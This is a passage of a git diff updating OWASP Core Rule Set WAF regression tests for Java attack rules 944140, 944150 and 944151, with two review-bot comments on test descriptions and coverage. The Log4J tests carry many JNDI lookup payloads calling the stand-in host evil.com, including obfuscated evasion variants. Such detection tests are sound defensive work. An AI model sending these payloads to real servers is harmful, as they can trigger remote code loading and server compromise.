+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081afde..47f48e5e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml 
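Review bot: All nine new test cases in this hunk carry the identical `desc: Java script uploads`, so a go-ftw failure summary for this file cannot be read without opening the YAML; the `desc` should say what each case exercises, e.g. for test 1 `desc: "Java script uploads - no filename header, must not match"`, for test 3 `desc: "Java script uploads - X_Filename header with .jsp"` and for test 9 `desc: "Java script uploads - .html filename, must not match"`. The two negative cases (tests 1 and 9, `no_expect_ids`) gain the most, since a positive and a negative case that both fail look the same in the summary. As a minor style point, `dest_addr`, `Host` and `Accept` are plain scalars here while the neighbouring 944130 and 944150 hunks quote `dest_addr`; both parse the same, but one quoting convention per directory is easier to lint.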
@@ -1,438 +1,436 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" - description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - 
data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: 
application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: 
POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 14 desc: Log4J exploit on JSON with numeric 
HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + 
headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL 
encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-22 + - input: + 
dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: 
"*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e0235..f056faeac 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml 
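Review bot: All 24 test cases in this hunk are positive (`expect_ids: [944150]`) and none sends a benign request, so a regression that makes 944150 fire on ordinary `${...}` template text would go unnoticed; adding at least one `no_expect_ids: [944150]` case with a constructed harmless body such as `data: 'foo=${greeting}'` would pin the rule's false-positive boundary the way 944140 tests 1 and 9 do. The same gap appears to apply to the 944151 hunk below, whose end is outside this view. Separately, as rendered here test 3's `data:` is empty and tests 12 and 14 show a plain `${jndi:...}` payload despite describing named and numeric HTML entity evasion; that looks like the page dropping `<...>` and decoding `&lbrace;`/`&#123;` rather than a defect in the commit, but it is worth confirming the committed file still holds the XML body and the undecoded entities, since otherwise those cases duplicate other tests.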
@@ -1,456 +1,454 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" - description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - 
data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: 
application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: 
